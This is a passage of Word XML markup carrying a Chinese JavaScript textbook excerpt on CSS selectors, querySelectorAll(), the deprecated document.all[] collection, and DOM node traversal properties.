        <w:t>*[name="x"]//</w:t>
      </w:r>
      <w:r>
        <w:t>所有包含</w:t>
      </w:r>
      <w:r>
        <w:t>name="x"</w:t>
      </w:r>
      <w:r>
        <w:t>属性的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这些基本的选择器可以组合使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>span.fatal.error//</w:t>
      </w:r>
      <w:r>
        <w:t>其</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>中包含</w:t>
      </w:r>
      <w:r>
        <w:t>"fatal"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"error"</w:t>
      </w:r>
      <w:r>
        <w:t>的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>span[lang="fr"].warning//</w:t>
      </w:r>
      <w:r>
        <w:t>所有使用法语的且其</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>中包含</w:t>
      </w:r>
      <w:r>
        <w:t>"warning"</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择器可以指定文</w:t>
      </w:r>
      <w:r>
        <w:t>档结构：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#log span//id="log"</w:t>
      </w:r>
      <w:r>
        <w:t>元素的后代元素中的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#log</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>span//id="log"</w:t>
      </w:r>
      <w:r>
        <w:t>元素的子元素中的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>h1:first-child//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞的子元素中的第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择器可以组合起来选取多个或多组元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>div,#log//</w:t>
      </w:r>
      <w:r>
        <w:t>所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，以及</w:t>
      </w:r>
      <w:r>
        <w:t>id="log"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如你所见，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器可以使用上述所有方法选取元素：通过</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>、名字、标签名和类名。与</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>选择器的标准化一起的另一个称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>选择器</w:t>
      </w:r>
      <w:r>
        <w:t>API”</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>W3C</w:t>
      </w:r>
      <w:r>
        <w:t>标准定义了获取匹配一个给定选择器的元素的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的关键是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>。它接受包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器的字符串参数，返回一个表示文档中匹配选择器的所有元素的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象。与前面描述的选取元</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>素的方法不同，</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象并不是实时的：它包含在调</w:t>
      </w:r>
      <w:r>
        <w:t>用时刻选择器所匹配的元素，但它并不更新后续文档的变化。如果没有匹配的元素，</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回一个空的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果选择器字符串非法，</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>将抛出一个异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>，文档对象还定义了</w:t>
      </w:r>
      <w:r>
        <w:t>querySelector()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。与</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>的工作原理类似，但它只是返回第一个匹配的元素（以文档顺序）或者如果没有匹配的元素就返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这两个方法在</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点中也有定义（并且也在</w:t>
      </w:r>
      <w:r>
        <w:t>Docum</w:t>
      </w:r>
      <w:r>
        <w:t>entFragment</w:t>
      </w:r>
      <w:r>
        <w:t>节点中，见</w:t>
      </w:r>
      <w:r>
        <w:t>15.6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）。在元素上调用时，指定的选择器仍然在整个文档中进行匹配，然后过滤出结果集以便它只包含指定元素的后代元素。这看起来是违反常规的，因为它意味着选择器字符串能包含元素的祖先而不仅仅是上述所匹配的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>":first-line"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>":first-letter"</w:t>
      </w:r>
      <w:r>
        <w:t>等伪元素。在</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>中，它们匹配文本节点的一部分而不是实际元素。如果和</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>querySelector()</w:t>
      </w:r>
      <w:r>
        <w:t>一起使用它们是不匹配的。而且，很多浏览器会拒绝返回</w:t>
      </w:r>
      <w:r>
        <w:t>":l</w:t>
      </w:r>
      <w:r>
        <w:t>ink"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>":visited"</w:t>
      </w:r>
      <w:r>
        <w:t>等伪类的匹配结果，因为这会泄露用户的浏览历史记录。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>所有当前的浏览器都支持</w:t>
      </w:r>
      <w:r>
        <w:t>querySelector()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。但是注意，这些方法的规范并不要求支持</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>选择器：鼓励浏览器支持和在样式表中一样的选择器集合。当前的浏览器除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>都支持</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>选择器。</w:t>
      </w:r>
      <w:r>
        <w:t>IE 7</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:t>CSS2</w:t>
      </w:r>
      <w:r>
        <w:t>选择器。（期望</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>能支持</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>选择器。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>是终极的选取元素的方法：它是一种非常强大的技术，通过它客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序能够</w:t>
      </w:r>
      <w:r>
        <w:t>选择它们想要操作的元素。幸运的是，甚至在没有</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>的原生支持的浏览器中也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>库（见第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章）使用这种基于</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器的查询作为它的核心编程范式。基于</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序使用一个轻便的、跨浏览器的、和</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>等效的方法，命名为</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>CS S</w:t>
      </w:r>
      <w:r>
        <w:t>选择器匹配代码已经作为一个独立的标准库提出来并发布了，命名为</w:t>
      </w:r>
      <w:r>
        <w:t>Sizzle</w:t>
      </w:r>
      <w:r>
        <w:t>。它已经被</w:t>
      </w:r>
      <w:r>
        <w:t>Dojo</w:t>
      </w:r>
      <w:r>
        <w:t>和其他一些客户端库所采纳</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>。使用一个类似</w:t>
      </w:r>
      <w:r>
        <w:t>Sizzle</w:t>
      </w:r>
      <w:r>
        <w:t>的库（或一个包</w:t>
      </w:r>
      <w:r>
        <w:t>含</w:t>
      </w:r>
      <w:r>
        <w:t>Sizzle</w:t>
      </w:r>
      <w:r>
        <w:t>的库）的好处就是在老式浏览器中选取元素也能正常工作，并保证一个基准的选择器集合在所有的浏览器中都能运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="360" w:name="15_2_6_document_all__"/>
      <w:r>
        <w:t>15.2.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>document.all[]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="360"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>标准化之前，</w:t>
      </w:r>
      <w:r>
        <w:t>IE 4</w:t>
      </w:r>
      <w:r>
        <w:t>引入了</w:t>
      </w:r>
      <w:r>
        <w:t>document.all[]</w:t>
      </w:r>
      <w:r>
        <w:t>集合来表示所有文档中的元素（除了</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点）。</w:t>
      </w:r>
      <w:r>
        <w:t>document.all[]</w:t>
      </w:r>
      <w:r>
        <w:t>已经被标准的方法（如</w:t>
      </w:r>
      <w:r>
        <w:t>getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>）等所取代，现在已经废弃不应该再使用了。但是，在引入之时它是革命性的，它在以各种方式使用的已有代码中仍然可以看到</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.all[0]//</w:t>
      </w:r>
      <w:r>
        <w:t>文档中第一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.all["navbar"]//id</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"navbar"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素（或多个元素）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.all.navbar//</w:t>
      </w:r>
      <w:r>
        <w:t>同上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.all.tags("div")//</w:t>
      </w:r>
      <w:r>
        <w:t>文档中所有的＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.all.tags("p")[0]//</w:t>
      </w:r>
      <w:r>
        <w:t>文档中第一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="361" w:name="15_3_Wen_Dang_Jie_Gou_He_Bian_Li_"/>
      <w:r>
        <w:t>15.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文档结构和遍历</w:t>
      </w:r>
      <w:bookmarkEnd w:id="361"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一旦从文档中选取了一个元素，有时需要查找文档中与之在结构上相关的部分（父亲、兄弟和子女）。文档从概念上可以看做是一棵节点对象树，如图</w:t>
      </w:r>
      <w:r>
        <w:t>15-1</w:t>
      </w:r>
      <w:r>
        <w:t>所示。节点类型定义了遍历该树所需的属性，我们将在节</w:t>
      </w:r>
      <w:r>
        <w:t>15.3.1</w:t>
      </w:r>
      <w:r>
        <w:t>中介绍。另一个</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>允许文档作为元素对象树来遍历。</w:t>
      </w:r>
      <w:r>
        <w:t>15.3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍这个新的（通常也更容易使用的）</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="362" w:name="15_3_1_Zuo_Wei_Jie_Dian_Shu_De_Wen_Dang_"/>
      <w:r>
        <w:t>15.3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为节点树的文档</w:t>
      </w:r>
      <w:bookmarkEnd w:id="362"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象、它的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象和文档中表示文本的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>对象都是</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>定义了以下重要的属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该节点的父节点，或者针对</w:t>
      </w:r>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象应该是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，因为它没有父节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>childNodes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>只读的类数组对象（</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象），它是该节点的子节点的实时表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>firstChild</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>lastChild</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该节点的子节点中的第一个和最后一个，如果该节点没有子节点则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>nextSibling</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>previoursSibling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该节点的兄弟节点中的前一个和下一个。具有相同父节点的两个节点为兄弟节点。节点的顺序反映了它们在文档中出现的顺序。这两个属性将节点之间以双向链表的形式连接起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该节点的类型。</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>节点，</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点，</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点，</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点，</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>代表</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>nodeValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点或</w:t>
